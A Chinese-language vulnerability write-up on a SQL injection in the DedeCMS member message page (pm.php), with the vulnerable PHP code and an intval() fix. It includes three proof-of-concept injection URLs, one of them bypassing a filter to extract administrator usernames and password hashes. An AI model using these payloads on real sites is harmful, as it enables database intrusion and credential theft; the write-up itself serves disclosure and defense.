dedecms /member/pm.php SQL Injection Vul

標籤：

catalog

1. 漏洞描述2. 漏洞觸發條件3. 漏洞影響範圍4. 漏洞程式碼分析5. 防禦方法6. 攻防思考

 

1. 漏洞描述

Dedecms測試人員中樞注入漏洞

Relevant Link

http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html

2. 漏洞觸發條件

0x1: POC1

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1‘ and char(@`‘`) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%20%23

0x2: POC2

如果報錯: Safe Alert: Request Error step 1 !

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%[email protected]__admin`%23

0x3: POC3

報錯注入

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @‘ and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1‘=‘1

Relevant Link

http://www.myhack58.com/Article/html/3/62/2014/42255.htm

3. 漏洞影響範圍
4. 漏洞程式碼分析

/member/pm.php

else if($dopost==‘read‘){    $sql = "SELECT * FROM `#@__member_friends` WHERE  mid=‘{$cfg_ml->M_ID}‘ AND ftype!=‘-1‘  ORDER BY addtime DESC LIMIT 20";    $friends = array();    $dsql->SetQuery($sql);    $dsql->Execute();    while ($row = $dsql->GetArray())     {        $friends[] = $row;    }    //$id注入    $row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id=‘$id‘ AND (fromid=‘{$cfg_ml->M_ID}‘ OR toid=‘{$cfg_ml->M_ID}‘)");//ID沒過濾    if(!is_array($row))    {        ShowMsg(‘對不起，你指定的訊息不存在或你沒許可權查看！‘,‘-1‘);        exit();    }    //$id注入    $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id=‘$id‘ AND folder=‘inbox‘ AND toid=‘{$cfg_ml->M_ID}‘");    $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder=‘outbox‘ AND toid=‘{$cfg_ml->M_ID}‘");    include_once(dirname(__FILE__).‘/templets/pm-read.htm‘);    exit();}

Relevant Link

http://0day5.com/archives/1313

5. 防禦方法

/member/pm.php

else if($dopost==‘read‘){    $sql = "Select * From `#@__member_friends` where  mid=‘{$cfg_ml->M_ID}‘ And ftype!=‘-1‘  order by addtime desc limit 20";    $friends = array();    $dsql->SetQuery($sql);    $dsql->Execute();    while ($row = $dsql->GetArray())     {        $friends[] = $row;    }    /* $id過濾 */    $id = intval($id);    /* */     $row = $dsql->GetOne("Select * From `#@__member_pms` where id=‘$id‘ And (fromid=‘{$cfg_ml->M_ID}‘ Or toid=‘{$cfg_ml->M_ID}‘)");    if(!is_array($row))    {        ShowMsg(‘對不起，你指定的訊息不存在或你沒許可權查看！‘,‘-1‘);        exit();    }    $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where id=‘$id‘ And folder=‘inbox‘ And toid=‘{$cfg_ml->M_ID}‘");    $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where folder=‘outbox‘ And toid=‘{$cfg_ml->M_ID}‘");    include_once(dirname(__FILE__).‘/templets/pm-read.htm‘);    exit();}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

 

dedecms /member/pm.php SQL Injection Vul